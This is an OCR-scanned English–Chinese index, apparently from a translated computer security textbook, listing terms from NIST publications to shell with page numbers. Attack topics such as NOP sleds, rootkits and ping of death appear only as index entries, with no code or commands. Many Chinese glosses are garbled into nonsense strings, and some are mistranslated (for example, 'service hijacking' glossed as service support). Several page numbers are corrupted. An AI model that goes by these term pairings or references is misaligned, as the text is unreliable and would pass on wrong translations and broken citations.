cloud computing reference architecture ( SP 500- 
292 云 计算 参考 架构 )，185 
information technology security training 
requirements A role- and performance-based 
model ( SP800-16 信息 技术 安全 训练 要 求 : 
基于 角色 和 性 能 的 模型 )，558 
computer security incident response term ( SP 800-61 


计算 机 安全 事件 响应 小 组 )，568，571-572 
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security awareness, training and education 
programs ( SP 800-100 安全 意识 ， 训 练 和 教 
育 项 目 )，557 
definition of cloud computing ( SP-800-145 云 计算 
X), 181, 189 
security control (SP800-53 安全 控制 )，519，521-522 
principles (SP800-116 准则 )，551-552 
standards for security categorization of federal 
information and information systems ( FIPS 
199 标准 )，13 
National Security Agency (美国 国家 安全 局 )，5，27， 
37, 458, 470, 638 
native virtualization systems 〈 本 地 虚拟 机 系统 )，433 
natural disasters as threat to physical security (自然 灾 
害 ， 物 理 安全 威胁 )，536-539 
n bit blocks of ciphertext (n 比特 密 文 分 组 )，45 
Nessus，430 
kernel module (Netfilter 内 核 模 块 )，429 
network attack surface (网 络 攻击 界面 )，31 
network-based IDS (基于 网 络 的 IDS)，273，283- 
289, 570 
application layer reconnaissance and attack (hv 用 
程序 层 侦查 和 攻击 )，287 
deployment of network sensors (网 络 传感器 部 署 )， 
285-287 
logging of alerts (警告 日 志 )，288-289 
policy violation (违反 策略 )，287 
transport layer reconnaissance and attack (传输 层 
侦查 和 攻击 )，287 
unexpected application service (不 可 预料 的 应 用 
服务 )，287 
network-baed IPS (基于 网 络 的 IPS), 324 
network file system (网 络 文件 系统 )，287 
network injection attack (网 络 注 和 攻击 )，734 
network interface card (网 络 接口 卡 )，284，434 
network layer address spoofing (网 络 层 地 址 假冒 )，311 
network security (网 络 安全 )，193 
attack (攻击 )，24，25 
network sensor〔( 网 络 传感器 )，284 
neural network (神经 网 络 )，277 
never before seen anomaly detection driver ( Never 
Before Seen 异常 检测 驱动 )，603 
next header (下 一 个 头 部 )，710 
no execute bit (no-excute 位 ， 非 执行 比特 )，364 
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noise as a physical interference (物理 干扰 噪声 )，542-543 

nonexecutable memory ( 非 执 行内 存 )，364 

nonrepudiation (PAJARRE), 13-14, 16, 472, 521, 585 

nontraditional networks ( 非 传统 网 络 )，733 

nonvolatile memory ( 非 易 变 内 存 )，469 

NOP sled, 356-357, 364, 366, 368 

notification (通知 )，293 

terminator (NULL 终止 符 )，340-341 

O 

object access (对象 访 问 )，591 

object attributes (对象 属性 )，134 

object of access control (对 象 访问 控制 )，117 

observe (观察 )，451 

obstruction (BA##), 20-21, 29 

off by one attack ( 差 一 错误 攻击 )，366 

offline dictionary attack (离线 字典 攻击 )，79 

on command self service ( 按 需 自 服 务 )，182 

one way hash function ( 单 向 散 列 函数 )，50-53，78， 
82, 670, 765 

one way/preimage resistant ( 单 向 /抗原 象 )，53 

online certificate status protocol (在 线 证 书 状 态 协 
议 )，724 

online poll (在 线 调 查 )，223 

open access control policy (开放 访问 控制 策略 )， 
115-116 

OpenBSD system ( OpenBSD R), 83, 360, 362, 
365 

open design (开放 设计 )，29 

open identity exchange (开放 身份 交换 )，145 

open identity trust framework (开放 身份 可 信和 网 络 )， 
145-147 

OpenID foundation (OpenID #42), 145 

OpenID identity provider (OpenID 身份 提供 商 )，145 

open recursive DNS server (开放 递归 DNS 服务 器 )，259 

open shortest path first (开放 最 短路 径 优先 )，709 

open system interconnection (FARRE), 311, 701 

open web application security project report (FF 放 
Web 应 用 程序 安全 项 目 报告 )，163 

open web application security project top ten ( 开 放 
Web 应 用 程序 安全 项 目前 十 名 )，376-377 

operating system based security mechanisms (基于 操 
作 系 统 的 安全 机 制 )，158 

operating system (操作 系统 ) 

environment variables (环境 变量 )，397-400 


interacting with other programs ( 与 其 他 程序 交互 )， 
408-409 
least privileges (最 少 特权 )，400-402 
race condition( 竞 态 条 件 ， 竞 争 条 件 )，405-406 
privilege escalation (特权 扩大 )，400-402 
standard library function (标准 库 函 数 )，402-405 
system call (系统 调用 )，402-405 
temporary files( 临 时 文件 )，407-408 
operating system security (操作 系统 安全 ) 
additional security controls (附加 安全 控制 )，423 
category of users, groups, and authentication (用 户 ， 
组 ， 认 证 分 类 )，422 
hardening and configuring operating system (加 
和 配置 操作 系统 )，419-423 
initial setup and patching (初始 化 安全 和 补丁 )， 
420-421 
planning (计划 )，419 
removing unnecessary services, applications, 
protocols (删除 不 必要 的 服务 、 应 用 程序 、 
协议 )，421-422 
resources controls (资源 控制 )，422 
security layers (安全 层 )，417 
security testing (安全 测试 )，432 
operational control (操作 控制 )，35，517-518 
operator (操作 者 )，293 
Opt-in，469 
Orange book (EEP), 470 
organizational security policy (组 织 安 全 策略 )， 
489-492 
OR-node (或 节点 )，32-33 
OSI security architecture (OSI 安全 架构 )，4-5 
out of band attack ( 带 外 攻击 )，167 
outside attack〈 外 部 攻击 )，19 
overflow (Yt tH ) 
buffer (Bt X ), 337-338, 342, 348-349, 351- 
352, 359-360, 362-365, 370 
Global data area (全 局 数据 域 )，370-371 
heap (4), 367-370 
replacement stack frame ( 栈 帧 替换 )，365-366 
overvoltage condition (过 电压 条 件 )，542 
owner (所 有 者 )，56，61，67，91，117，121-123， 
125-127, 135-136, 169, 171-173, 177-179, 
196, 397-400, 407-408, 428, 615-616, 618, 
626, 719, 722 


owner access right (所 有 者 访问 权 )，123 
ownership-basd administration (基于 所 有 权 的 管 
理 )，169 
P 
packet filtering firewall ( 包 过 滤 防 火 墙 )，309-312 
pack function (pack 函数 )，348 
Padding (填充)，710 
Pad length (填充 长 度 )，710 
pairwise keys (成 对 密 钥 )，753-756 
pairwise master key (成 对 主 密 铀 )，753 
pairwise transient key (成 对 临时 密 钥 )，754 
Pantomimes, copyrighted (舞剧 作品 ， 版 权 )，616 
parameterized query insertion (参数 查询 插 人 )，168 
parasitic software (寄生 软件 )，204 
parasitic virus (寄生 病毒 )，221 
partitioning (划分 )，179 
passive attack (被 动 攻击 )，19，24-25 
passive sensor (被 动 传感器 )，284，297 
password authenticated connection establishment ( 口 
令 认 证 连接 设施 )，96 
password (口令 )，55 
cracking of user-chosen password (破解 用 户 选 择 
口令 )，83-85 
file access control (文件 访问 控制 )，86 
guessing against single user ( 单 用 户口 令 猜测 )，78-90 
length (KÆ), 83 
protocol (HPX), 101-102 
password-based authentication (基于 口令 的 认证 )，78-90 
identifier (身份 )，78 
use of hashed password ( 散 列 口令 使 用 )，80-83 
vulnerability (脆弱 性 ， 漏 洞 )，78-80 
password crack (口令 破解 )，82 
password selection strategy (口令 选择 策略 )，86-90 
Bloom filter (Bloom 过 滤器 )，88-90 
complex password policy (复杂 口令 策略 )，88 
computer generated password (计算 机 生成 的 口 
令 )，88 
password checker (口令 检查 )，88 
reactive password checking (被动 口令 校 验 )，88 
rule enforcement (规则 实施 )，88 
user education strategy (用 户 教育 策略 )，88 
using proactive password checker (主动 口令 检查 )，88 
patch management (补丁 管理 ) 
security (Linux/UNIX 安全 )，427 
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security (Windows 安全 )，430 
patching (hT ), 188, 306, 420-421 
patents, intellectual property (专利 ， 知 识 产权 )， 
615, 617 
Path MTU (584 MTU), 710 
PATH variable (PATH Æ), 398-399 
pattern matching (模式 匹配 )，324 
payload (负载 )，205，221-229 
payload action (负载 行为 )，202 
PC cyborg trojan (PC 电子 人 木马 )，222 
PC data encryption (PC 数据 加 密 )，67 
peer-to-peer gossip protocol (点 对 点 gossip 协议 )，289 
perimeter scanning approach (边界 扫描 方法 )，234-235 
periodic review of audit trail data (审计 追踪 数据 的 
定期 检查 )，601 
permanent key (FAEH), 663 
permission (许可 )，28-29，74，124-125，127，130- 
131, 133, 138-139, 172-173, 208, 393, 397, 
408, 420, 422, 427-429, 431, 460-461, 626 
persistent (持久 的 )，203 
personal firewall (个 人 防火 墙 )，316-317 
personal identification number (个 人 标识 码 )，34， 
75, 91, 95, 98, 142, 548 
personal identity verification (个 人 身份 认证 )，548-550 
personal privacy (个 人 隐私 )，619 
personal property (个 人 财产 )，615 
personnel security (员工 安全 )，27 
during employment (雇用 期 间 )，565 
phishing (网 络 仿冒 ， 网 络 钓 鱼 )，192，200，202- 
203，218-219，224-226，271，230，330，614 
physical access audit trail (物理 访问 审计 追踪 )，587 
physical access control system (物理 访问 控制 系统 )， 
551-553 
physical and logical security (物理 和 逻辑 安全 )，547-553 
physical facility (物理 设备 )，536 
physical isolation (物理 隔离 )，30 
physical probing (物理 探测 )，474 
physical security (物理 安全 )，535 
breach (WIR), 546-547 
environment threat (环境 威胁 )，539-542 
Human-caused threat (人 为 威胁 )，543，545-546 
natural disaster as threat (自然 灾害 威胁 )，536-539 
personal identity verification (个 人 身份 认证 )， 
548-550 
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prevention and mitigation measure (预防 和 迁移 措 
Hi), 543-546 
technical threat (技术 威胁 )，542-543 
threat (威胁 )，536-543 
physical user input (物理 用 户 输入 )，166 
pictorial, graphic, sculptural works copyright (画报 、 
图 像 、 雕 像 作品 版 权 )，616 
Piggybacked query (WERAH), 167 
Ping of death, Dos (死亡 之 ping)，243 
PIV authentication key (PIV 认证 码 )，551 
PIV card issuance and management subsystem ( PIV 
卡 发 行 和 管理 子 系统 )，548 
PIV front end subsystem (PIV 前 端子 系统 )，548 
plaintext (463X), 42-43, 56, 638, 646 
public key encryption ( 公 钥 加 密 )，56 
symmetric encryption (对 称 加 密 )，42 
Plan-Do-Check-Act Process Model (“规划 -实施 - 
检查 - 处 置 ”过 程 模型 )，489 
planning (计划 )，26 
plant patent (植物 专利 )，617 
platform as a service (平台 即 服务 )，182-183 186 
poison packet (有 害 消息 )，242 
policy changes (策略 改变 )，591 
policy enforcement point (策略 实施 点 )，291 
policy management (策略 管理 )，142 
policy scope (策略 范围 )，566 
policy instantiation (策略 实例 化 )，465-466 
polymorphic virus (多 态 病毒 )，208-209，232 
popular password attack ( 弱 口 令 攻击 )，79 
position independent (位 置 独立 )，352-353 
X86 assembly code (X86 汇编 代码 )，353 
post office protocol (邮局 协议 )，287 
practical security assessment (实际 的 安全 评估 )， 
53-54 
preimage resistant (抗原 象 )，53 
preimage resistant hash function (抗原 象 散 列 函 数 )， 
53-54 
premise security (整体 安全 )，535 
premium content Web site (优质 内 容 网 站 )，8 
preprocessing 〈 预 处 理 )，660 
prerequisite (先决 条 件 )，133 
preset session ID ( 预 设 会 话 ID )，34 
pre-shared key 〈 预 分 享 密 钥 )，753 
preventative control (预防 性 控制 )，518 


prevention( 预 防 )，19，24-25,，27，30，35-36，64， 
79, 109, 114, 163, 168, 175, 190, 225, 
252, 259, 262-263, 281, 310, 312, 329, 
334, 337, 362, 365-366, 370, 376, 385-387, 
398-399, 404-405, 41-, 413, 418, 420, 423, 
431, 454-455, 459, 518, 520, 535-536, 543- 
436, 552, 555, 571, 573, 581, 614, 619, 
622, 624, 700, 704, 707, 710, 735 
primary key (= #749), 159-161, 180, 465 
printf function routine (printf 函数 库 路 径 )，348 
privacy (B&A), 13, 566 
computer usage (计算 机 使 用 )，624-625 
data surveillance (数据 监管 )，625-626 
European Union Data Protection Directive (欧盟 数 
据 保 护 指令 )，622 
law and regulation (法 律 和 规范 )，622-623 
message integrity (消息 完整 性 )，746 
United States Privacy Act (美国 隐私 法 案 )，623-624 
Private cloud (私有 云 )，184 
private key ( 私 钥 )，56-58，60-61，425，681，688 
privilege escalation (特权 提升 )，400 
privilege management (特权 管理 )，142 
privilege use (特权 使 用 )，591 
proactive password chacker (主动 口令 检查 )，88 
process tracking (过 程 追 踪 )，591 
profile-based anomaly detection (基于 轮廓 的 特征 检 
测 )，275 
program code (程序 代码 ) 
allocation and management of dynamic memory 
storage (动态 内 存 的 分 配 和 管理 )，395-396 
correct algorithm implementation (正确 算法 实现 )， 
392-394 
correspondence between algorithm and machine 
language (算法 和 机 器 语言 的 一 致 )，394 
interpretation of data value (数据 值 的 翻译 )，394-395 
preventing race condition with shared memory ( fH 
止 共享 内 存 竞 争 条 件 的 产生 )，396 
program input (程序 输入 )，380-381 
buffer overflow (缓冲 区 溢出 )，381 
canonicalization (标准 化 ， 规 范 化 )，390 
escaping metacharacters ( 转 义 字符 )，389 
multiple encodings (多 重 编码 )，389 
validating syntax 《有效 语法 )，388-390 
programer (程序 员 )，562 
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programing projects (编程 项 目 )，767 
program output (程序 输出 )，409-411 
Project MAC ( multiple-access computer) (多 访问 计 
算 机 项 目 )，449 
propagation phase of virus (病毒 的 传播 阶段 )，205 
protected storage (保护 存储 )，469-470 
protection (保护 ) 
domain (域名 )，123-124 
media (媒体 )，26 
physical and environment (物理 和 环境 )，26 
profiles (轮廓 )，472，474-476 
system and communication (系统 和 通信 )，27 
protocol anomaly (协议 异常 )，324 
protocol identifier (协议 标识 符 )，709 
protocol type selection command (协议 类 型 选择 命 
令 )，92 
provable security (可 证 明 安全 )，660 
proxy certificates (代理 认证 )，724 
pseudonymity (化 名 )，624 
pseudonym function〔 伪 随机 函数 )，758-760 
pseudonym numbers( 伪 随机 数 )，64-66 
psychological acceptability (心理 接受 度 )，29 
public access system (公共 访问 系统 )，522 
public cloud (公有 云 )，183 
public-display right (公示 权 )，616 
public key certificate( 公 钥 认证 )，61-62，697 
public key encryption/cryptosystem〈 公 钥 加 密 / 加 密 
系统 )，55-60，92，222 
application (应 用 程序 )，58，60 
asymmetric encryption algorithm ( 非 对 称 加 密 算 
法 )，59-60 
authentication and data integrity (认证 和 数据 完整 
性 )，57 
confidentiality (机 密 性 )，56-57 
key exchange (Diffie-Hellman 密 钥 交换 )，684-688 
digital signature standard (数字 签名 标准 )，688 
elliptic curve cryptography (椭圆 曲线 加 密 )，688-689 
general-purpose (一 般 目 的 )，56 
ingredients (成 分 ， 要 素 )，56 
public-key distribution ( 公 钥 分 发 )，55 
RSA, 679-684 
secure hash function (安全 散 列 函数 )，670-675 
symmetric key exchange (对 称 密 钥 交 换 )，62-63 
public-key information ( 公 钥 信息 )，722 


public-key infrastructure ( 公 钥 基础 设施 )，725-726 
public key ( 公 钥 )，$6，60，686，688，725 
public-performance right (公开 表演 权 )，616 
Q 
quality of service attributes (服务 质量 属性 )，134 
query (查询 )，20，164，166，168，177-178，283， 
393, 464-465, 603, 626, 724 
AS, 718 
database (数据 库 )，243 
DNS, 253, 256-257, 259 
illegal/logically incorrect (非法 / 逻辑 不 正确 )，167 
inference (推论 )，173，175 
piggybacked (HHR), 167 
query language (#WWi# A), 158-159, 162-163, 
query processor (查询 处 理 器 )，179 
R 
race condition (竞争 条 件 ， 竞 态 条 件 )，396 
radix-64 ( 64 基数 )，696-697 
rainbow table (彩虹 表 )，83 
random access (随机 访问 )，660 
random access memory (随机 访问 内 存 )，92 
random delay (随机 延迟 )，684 
random number (随机 数字 )，80，78，93 ，102-103 
random number generator (随机 数 生 成 器 )，468 
random number security algorithm 随机 数 安全 算法 )， 
64-65 
independence (独立 性 )，64 
pseudorandom number ( 伪 随 机 数 )，65-66 
uniform distribution (一 致 分 发 )，64 
unpredictability (不 可 预测 )，65 
ransomware (勒索 软件 )，221-222 
rapid elasticity (快速 的 弹性 )，182 
rate limiting (比率 限制 )，592-593 
raw socket interface (原始 套 接 字 接 口 )，244 
RC4 algorithm (RC4 算法 )，653-655 
reactive password checking (被 动 口令 检查 )，88 
read access〈 读 访问 )，117，464 
rading/report assignment (ix / 报告 任务 )，768 
read-only memory (只 读 内 存 )，92 
Realms，Kerberos (Kerberos 域 )，64，707，716-722 
real property (不 动产 )，615 
Real-time audit analysis (实时 审计 分 析 )，602 
Reasonable personal use (个 人 合理 地 使 用 )，567 
Received code (接收 代码 )，49 
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Reconnaissance (侦察 )，226 
Recover (恢复 )，19 
Recovery (恢复 )，36 
Recursive function call (递归 函数 调用 )，343 
Reference monitors (基准 监视 器 )，457-458 
Reflection attacks (反射 攻 击 )，255-257 
Reflector attacks (反射 器 攻击 )，250，255-257 
Registration (注册 )，727 
Registration authority, RA (注册 机 构 )，74，726-727 
Registry access (注册 表 访 问 )，279 
Regular expression (正则 表达 式 )，389 
Regulations obligations (法规 的 义务 )，558 
Reject (拒绝 )，326 
Relation (关系 )，159-160，400，417，452，460-462， 
500, 522 
Relational databases (关系 数据 库 )，159-162 
abstract model of (抽象 模型 )，161 
basic terminologies of (基本 术语 )，160 
creation of multiple tables (ZREJE), 159 
elements of (元 素 )，159-162 
example (实例 )，160-161 
relational query language (关系 查询 语言 )，159 
structure (结构 )，159 
structured query language,SQL( 结 构 化 查询 语言 )， 
162-163 
Release of message contents (消息 内 容 泄 漏 )，24 
Reliance on key employees (核心 员工 依赖 )，565 
Relying parties, RPs (依赖 方 )，75，146 
Remote code injection attack (远程 代码 注入 攻击 )，401 
Remote Procedure Call，RPC (远程 过 程 调用 )，287 
Remote user authentication (远程 用 户 认 证 )， 参 见 
Authentication protocol 
dynamic biometric protocol (动态 生物 特征 认证 协 
议 )，103 
password protocol (口令 协议 )，101-102 
static biometric protocol (静态 生物 特征 认证 协 
议 )，103 
token protocol ( 令 牌 协议 )，102 
Replacement stack frame ( 蔡 换 栈 帧 )，365-366 
Replay (Œ 放 )，24，38，64，102，104-105，110， 
518, 687, 704, 710, 713, 719-720, 747, 758 
Replay attacks (HUH), 105, 687, 704, 758 
Repository (存储 库 )，727 
Reproduction right (复制 权 )，616 


Repudiation (抵赖 )，20-21，518 
Requests for Comments ( RFC， 请 求 评论 ， 请 求 注 
释 ),，9 
Intrusion Detection Exchange Format (人 侵 检 测 交 
换 格式 )，292 
RFC 2827, Network Ingress Filtering: Defeating 
Denial-of-service attacks which employ IP 
Source Address Spoofing (网 络 人 口 过 滤 : 击 
败 使 用 IP 源 地 址 欺骗 的 拒绝 服务 攻击 )，260 
RFC 2828 Internet Security Glossary (因特网 安全 
词汇 表 )，272 l 
RFC 4871: Domain Keys Identified Mail ( DKIM ) 
Signatures ( 域 密 钥 识 别 邮 件 签名 )，697 
RFC 4949, Internet Security Glossary (因特网 安 
全 词汇 表 )，17，114 
Requirements (需求 )，275 
Research projects (研究 项 目 )，766 
Residual risk (残留 风险 )，523 
Resource management (资源 管理 )，142 
Resource pooling (资源 池 )，182 i 
Resources (WWR), 134, 500, 732 
Response (MM), 36, 293 
Retinal biometric system (视网膜 生物 特征 认证 系 
统 )，97 
Return address defender, RAD (返回 地 址 保护 )，363 
Return to system call (返回 到 系统 调用 )，366-367 
Reverse engineering (逆向 工程 )，618 
REVOKE command (REVOKE 命令 )，169-170 
RFC, J Requests for Comments 
Rights holders (版权 所 有 者 )，620 
Rijndael, 45 
Risk (风险 )，17，19，499 
acceptance (接受 )，506-507 
analysis (分 析 )，380 
appetite (偏好 )，498 
avoidance (规避 )，507 
consequences (影响 )，503-504 
high level (高 级 别 )，78 
index (指数 )，496 
likelihood (可 能 性 )，502 
low level (低级 别 )，77 
moderate level (中 等 级 别 )，78 
register (登记 )，504-505 
transfer (转移 )，507 
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treatment (Ab), 506-507 
Risk assessment (风险 评估 )，27 
electronic user authentication (电子 用 户 认证 )，75-78 
of systems (系统 )，523 
Rivest, Ron, 59, 679 
Rlogin (远程 登录 )，287 
Robust filtering (强健 筛选 )，592 
Robust Security Network, RSN (强健 安全 网 络 )， 
746-747, 750, 760 
RockYou file (RockYou 文件 )，85 
Role (角色 )，130 
Role-based access control, RBAC (基于 角色 的 访问 
控制 )，116，127-133 
access control matrix (访问 控制 矩阵 )，129 
for a bank (用 于 银行 )，147-150 
base model (基准 模型 )，130-132 
cardinality (基数 )，133 
constraints (约束 )，132-133 
of database (数据 库 )，171-173 
key elements (要 素 )，129 
many-to-many relationships between users and roles 
(用 户 和 角色 间 的 多 对 多 关系 )，131 
matrix representation of (矩阵 表示 )，129 
multilevel security (2224), 460-461 
mutually exclusive roles ( 互 斥 角色 )，133 
non-overlapping permissions ( 非 重 要 权限 )，133 
prerequisites (先决 条 件 )，133 
reference models (参考 模型 )，130-133 
relationship of users to roles (用 户 角 色 关 系 )，128 
role-hierarchies (角色 层次 )，132 
Role constraints (角色 约束 )，132 
Role hierarchies (角色 层次 )，131-132 
Roles (角色 )，445，461 
fixed database (固定 数据 库 )，172 
fixed server (固定 服务 器 )，172 
hierarchies (层次 )，132 
RBAC (基于 角色 的 访问 控制 )，127-133，171-173 
relative to IT systems (相对 于 IT 系统 )，558 
user-defined (FA? A), 172-173 
Root (4#), 32-33, 136, 201, 217, 227, 236, 270, 
322, 356-358, 368-369, 371, 398, 401, 407, 
428-430, 449-450, 469, 585-586, 593, 685- 
687, 725, 750, 755 
Rootkits, 201, 226-229 


Blue Pill (#25), 229 
characteristics of (F£), 227-228 
countermeasures (对 策 )，234 
definition (X), 227 
external mode (外 部 模式 )，228 
kernel mode (内 核 模 式 )，228 
memory-based (基于 内 存 )，227 
persistent store code (持久 性 存储 代码 )，227 
system-level call attacks (系统 级 调用 攻击 )，228 
user mode (用 户 模 式 )，227 
virtual machine (虚拟 机 )，228-229 
Rotated XOR, RXOR (循环 异 或 )，671 
Routing applications of IPsec ( IPsec 的 路 由 应 用 )， 
708-709 
RSA public-key encryption algorithm ( RSA 4% 4A 加 
密 算 法 )，59，679-684 
description (描述 )，679-681 
factoring problem for ( 因 式 分 解 问题 )，682-683 
security (安全 )，681-684 
timing attacks and (时 序 攻击 )，683-684 
Rsh，287 
Rule-based anomaly detection (基于 规则 的 异常 检 
测 )，275-278 
Rule-based heuristic identification (基于 规则 的 启发 
式 识别 )，277-278 
Rule-based penetration identification (基于 规则 的 渗 
透 识 别 )，277-278 
Rules，The (规则 )，632 
Run-time defenses (运行 时 防御 )，363-365 
Run-time environment for application auditing (应 用 
程序 审计 的 运行 时 环境 )，599 
Run-time prevention techniques (运行 时 防范 技术 )，168 
S 
Safe coding techniques (安全 编码 技术 )，360-362 
Safeguard (防护 )，15，492，516-524，558，635 
Safe libraries (安全 库 )，362 
Safe temporary file use( 安 全 临时 文件 使 用 )，407 
Saffir/Simpson Hurricane Scale ( 萨 菲 尔 - F Y AME 
风 等 级 )，538 
Sakura crimeware toolkit (Sakura 犯罪 软件 工具 包 )，203 
Salt value( 盐 值 )，80-84 
San Diego Supercomputer Center (圣地 亚 哥 超级 计 
算 机 中 心 )，324 
Sanitized data (净化 数据 )，456 
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S-box (S #), 645, 648 
Scalability issues (可 伸缩 性 问题 )，5 
Scanning attack (扫描 攻击 )，288 
Screening router (屏蔽 路 由 器 )，321 
Scripting viruses (脚本 病毒 )，209-210 
Script-kiddies (脚本 小 子 )，269 
Sdrop (简单 丢弃 )，326 
Seagate Technology [SEAG08] (希捷 科技 )，44 
Search, access to (搜索 ， 接 人 )，117 
Second-generation scanner (第 二 代 扫 描 器 )，232 
Second-order injection (二 阶 注入 )，166 
Second preimage resistant hash function (第 二 抗原 象 
散 列 函 数 )，53 
Secret key ( 密 钥 ， 秘 密 密 钥 )，638 
authentication (认证 )，51-52 
public-key encryption ( 公 钥 加 密 )，56 
symmetric encryption (对称 加 密 )，42 
Secure electronic transactions，SET (安全 电子 交易 ， 
SET), 676, 722 
Secure file shredding program (安全 文件 粉碎 程序 )， 
403-404 
Secure Hash Algorithm, SHA (安全 散 列 算法 ， 
SHA), 54, 672 
Secure hash functions (安全 散 列 函数 )，53-54 
applications (应 用 )，55 
requirements (需求 )，53-54 
strength of (强度 )，54 
Secure key delivery (安全 密 钥 交付 )，752 
Secure/Multipurpose Internet Mail Extension, S/ 
MIME (安全 /多 用 途 互联 网 邮件 扩展 )，62， 
694-697, 699-700, 707, 722 
Secure programming (安全 编程 )，378 
Secure Shell, SSH (安全 的 Shell), 62 
connections (连接 )，408 
Secure sockets layer，SSL (安全 套 接 层 )，722 
Alert Protocol (警报 协议 )，703 
architecture (体系 结构 )，701-702 
Change Cipher Spec Protocol (更 改 密码 规范 协 
议 )，703 
Handshake Protocol (握手 协议 )，703-705 
Record Protocol (记录 协议 )，702-703 
Security as a service (安全 即 服务 )，189 
Security assessments (安全 评估 )，26，192 
Security association，SA (安全 关联 )，709-710 


Security assurance and evaluation (安全 保障 与 评估 ) 
Common Criteria Evaluation Assurance Levels ( 通 
用 准则 评估 保障 级 别 )，478-479 
evaluation process (评估 过 程 )，479-481 
scope of (范围 )，477-478 
target audience (目标 受众 )，476-477 
Security assurance requirements (安全 保障 要 求 )，476 
Security attack (安全 攻击 )，19，24，29，32，35， 
参见 Attacks 
Security auditing (安全 审计 )，475 
anomaly detection and (异常 检测 )，581 
at application-level (在 应 用 层 )，594-595 
application-level audit trails (应 用 层 审计 迹 )，587 
architecture (体系 结构 )，579-583 
audit data analysis (审计 数据 分 析 )，602-604 
audit review (审计 复核 )，602 
audit trail analysis (审计 迹 分 析 )，600-604 
baseline (基线 )，603 
case example (案例 )，604-607 
choice of data to collect (收集 数据 选择 )，584-587 
functions (功能)，580-581 
implementation guidelines (实施 准则 )，583 
implementing the logging function (实现 日 志 记 录 
功能 )，588-600 
involving DHCP (涉及 DHCP), 603 
physical access audit trails (物理 访问 审计 迹 )，587 
protecting audit trail data (保护 审计 迹 数据 )，588 
requirements for (要 求 )，581-583 
Site Security Handbook (RFC 2196 网 站 安全 手 
册 )，588 
at system level (系统 级 )，589-593，595 
system-level audit trails (系统 级 审计 迹 )，586 
terminology (术语 )，578 
timing (定时 )，601-602 
UNIX OS (UNIX 操作 系统 )，591-593 
user-level audit trail (用 户 级 审计 迹 )，587 
Windows OS (Windows 操作 系统 )，590-591 
Security audit trail (安全 审计 迹 )，580 
Security awareness (安全 意识 )，558 
program (程序 )，559-561 
training (培训 )，526 
Security basics and literacy category (安全 基础 知识 
和 素养 范畴 )，558 
Security class (安全 类 )，441 





Security classification (安全 分 级 )，441 
Security clearance (安全 许可 )，441 
Security compliance (安全 合 规 )，527 
Security controls (安全 控制 )，501 
Security education (安全 教育 )，562 
Security Education (Seed) Projects (安全 教育 (种子) 
TA), 764-766 
Security encryption (安全 加 密 )，621 
Security evaluation (IT)( 安 全 评估 ) 
assurance and (保障 )，476-481 
common criteria (通用 标准 )，470-476，478-479 
example of a protection profile (保护 配置 文件 的 
示例 )，474-476 
process (过 程 )，479-481 
profiles and target (配置 和 目标 )，472-474 
requirements (需求 )，471-472 
Security functional requirements (安全 功能 需求 )，475 
Security implementation (安全 实施 )，35-36 
case study (案例 学 习 )，528 531 
change and configuration management (变更 与 配 
置 管理 )，527-528 
compliance( 合 规 )，527 
controls (safeguard)( 控 制 (保障 ))，516-526 
detection of incidents (事件 检测 )，569-570 
documentation of incidents (事件 文档 )，573 
handling of incidents (事件 处 理 )，528，573-574 
incident response (事件 响应 )，571-572 
ISO security controls (ISO 安全 控制 )，520 
maintenance (维护 )，527 
NIST security controls ( NIST 安全 控制 )，519， 
521-522 
plans (iT XI), 524-526 
Security information and event management, SIEM 
(安全 信息 和 事件 管理 )，193 ，291，604-605 
Security intrusion (安全 人 侵 )，272 
Security kernel database (安全 核心 数据 库 )，458 
Security levels (安全 级 别 )，441 
Security maintenance, process of (安全 维护 ， 处 理 )， 
425-426 
Security manager (安全 管理 )，35 
Security mechanism (安全 机 制 )，16，29-31，36 
Security Monitoring，Analysis ，and Response 
System, MARS (安全 监控 、 分 析 和 响应 系统 
(MARS)), 606-607 
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Security objectives (安全 目标 )，474 
Security of the auditing function (审计 功能 的 安全 
性 )，583 
Security parameter index, SPI (安全 参数 索引 ), 709-710 
Security policy (ZER), 17, 34-35, 293, 477, 
491, 567 
violation (违例 )，34 
Security reports (安全 报告 )，580 
Security requirements (安全 需求 )，475-476 
Security risk assessment (安全 风险 评估 ) 
asset identification (资产 识别 )，498-499 
baseline approach (基准 法 )，493-494 
case study of (案例 研究 )，507-512 
combined approach (综合 的 方法 )，495 
context establishment (情景 建立 )，497-498 
detailed risk analysis (详细 风险 分 析 )，494-505 
identification of threats, risks, and vulnerability ( 识 
别 威胁 、 风 险 和 漏洞 )，499-501 
informal approach ( 非 正式 的 方法 )，494 
risk analysis and evaluation (风险 分 析 和 评价 )， 
501-507 
for user authentication (用户 身 份 认 证 )，75-78 
Security service module，SSM (安全 服务 模块 )，663 
Security targets, STs (安全 目标 )，473 
Security testing (安全 测试 )，423，430，432，618 
Security training program (安全 培训 方案 )，561-562 
sed program (sed 程序 )，398 
Selective drop (选择 性 丢 包 )，262 
Selective revelation (选择 性 披露 )，626 
SELECT statement (SELECT 语句 )，162 
Semicolon (分 号 )，165 
Sensors (传感器 )，272，293，325 
Separation of duties (职责 分 割 )，565 
Separation of privilege (权限 分 离 )，29 
Sequence counter overflow (序列 号 计数 器 溢出 )，710 
Sequence Number (序列 号 )，710 
Sequence number counter (序列 号 计数 器 )，709 
Sequence Time-Delay Embedding ( STIDE) algorithm 
(序列 时 延 府 入 算法 )，279 
Server (服务 器 )，178 
Server Message Block, SMB (服务 器 消息 块 )，287 
Server variables (服务 器 变量 )，166 
Service aggregation (服务 聚合 )，187 
Service arbitrage (服务 套利 )，187 
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Service hijacking (服务 支持 )，188 
Service intermediation (服务 中 介 )，186 
Service level agreements, SLAs (服务 等 级 协议 )，186 
Service providers〈 服 务 提供 商 )，143，145-147，188， 
620，697 
Session Initiation Protocol, SIP (会 话 初始 协议 )，287 
flood (HEYZ), 252-253 
Session key (4:5 94H), 64-65, 662-663, 697, 718: 
720, 752-753 
Sessions (4 i), 130, 133, 149, 410, 560-561, 
606-607, 702 
setfacl command (setfacl #74), 127, 428 
SetGID permission set (SetGID 权限 设置 )，125，428 
SetUID permission set ( SetUID 权 限 设 Bt), 125, 
357, 368, 428 
Shadow password file (影子 口令 文件 )，86 
SHA-1 engine (SHA-1 引擎 )，469 
Shamir, Adi, 59, 679 
Shared files, locking for software security (共享 文件 、 
软件 安全 锁定 )，405-407 
Shared libraries (共享 库 )，595-596 
Shared-resource covert channels (共享 资源 的 隐蔽 通 
道 )，450 
Shared system resources (共享 系统 资源 )，405-406 
Shared technology issues (共享 技术 问题 )，188 
SHA secure hash function (SHA 安全 散 列 函数 )， 
672-675 
Shell, 208, 251, 351-352, 356-357, 359, 367- 
